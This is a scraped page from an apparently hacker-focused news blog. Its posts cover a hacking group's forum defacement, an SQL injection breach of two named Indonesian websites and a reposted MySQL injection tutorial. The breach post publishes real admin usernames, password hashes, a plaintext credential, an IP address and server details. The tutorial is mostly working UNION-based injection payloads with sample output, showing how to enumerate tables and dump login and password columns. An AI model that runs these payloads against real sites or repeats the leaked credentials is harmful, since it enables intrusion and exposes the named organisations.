  • An Open Web and App Development Environment- An open platform that enables mission-critical applications and provides enhanced support for open standards, open-source applications, and various development languages.


Modern Workstyle, Enabled:- Provides users with flexible access to data and applications while simplifying management and maintaining security, control, and compliance. Windows Server 2012 can help you offer:

  • Access to Applications and Data from Virtually Anywhere, Any Device- Seamless, on-demand access to virtualized work environments from virtually anywhere.
  • A Full Windows Experience Anywhere- A personalized and rich user experience from virtually any device that adapts to different network conditions quickly and responsively.
  • Enhanced Data Security and Compliance- Granular access to data and corporate resources based on strong identity, data classification, and centralized policy administration and auditing.

To Download Windows Server 2012 (Both iso & VHD) Click Here


-Source (Microsoft) 







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Teamgreyhat Official Forum Hacked

Posted by Avik Sarkar On 1/15/2012 10:08:00 pm


Official Forum of one of the most popular hackers group named Teamgreyhat get hacked. A hacker named Hunt has hacked into the TGH's web-server and deface the index page. Also the hacker has claimed that he has breached all the data from that particular server. Since 2011 Teamgreyhat has became very popular form for hackers and also TGH is regarded as one of the most dangerous blackhat team as because if you dig the history you will find that TGH has rooted many web-servers and hacked millions of sites. Their last breach on Ankit Fadia's server gave them more popularity. But this hack will surely make a negative impact of TGH's reputation. The hacker also created deface mirror on the Arab-zone.

Teamgreyhat Reaction:- 
After this hack Teamgreyhat authority instantly released their statement. And in that they have clearly ignored the phenomena by saying Hunt (One Who Hacked The TGH Forum) belongs to TGH core team and he has full privilege on their server. In short he was maintaining that web-server. So a Admin can easily damage his own system. Also they have clearly stated that this is an internal attack. The hacker knew all the passwords and by which he logged into the system and changed the index page. To see the full press release of TGH click Here.




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

British Chamber of Commerce & Ministry of Culture and Tourism Indonesia Hacked By TEAM T!g3R

Posted by Avik Sarkar On 10/10/2011 05:45:00 pm


Vulnerability found by TEAM T!g3R on the official website of Ministry of Culture & Tourism and British Chamber of Commerce, Indonesia.
Vulnerable Website:-
http://www.budpar.go.id
http://www.britcham.or.id
 
Vulnerability:-
SQL-i
TEAM T!g3R also hacked into the database of these two websites and exposed sensitive data like server details, DB name, user name, password, admin details and so on.

Ministry of Culture & Tourism Indonesia:-
Admin Deatils:-
user       pass
admin     d3affb50918890deaf19360c7c?1d28
dadi       1601642654c68e2b?975be78915c8c7e
Database Name:-
Current DB:- budpar
Current DB:- information_schema
Web-Server:- Apache/2.2.14 (Fedora)
Hack Proof:-
For More information Click Here

British Chamber of Commerce Indonesia:-
Server Details:-
Target:-                 http://www.britcham.or.id
Host IP:-                202.67.9.74
Web Server:-         Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
Powered-by:-          PHP/5.2.17
DB Server:-            MySQL
Resp. Time(avg):-   2744 ms
Current User:-        britcham_user1@localhost
Sql Version:-           5.0.51a-community
Current DB:-           britcham_database
System User:-         britcham_user1@localhost
Host Name:-           asterix.serverku.com
Installation dir:-     asterix.serverku.com
Installation dir:-     /
DB User:-               'britcham_user1'@'localhost'
Admin Deatils:-
Data Found: user_name=britcham
Data Found: user_password=0b176060ef08c8d37d8aa756075c52ad
Data Found: user_id=1
Data Found: user_name=admin
Data Found: user_password=admin
Data Found: user_id=1
Hack Proof:-
For More information Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

Posted by Avik Sarkar On 12/02/2013 01:00:00 am

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search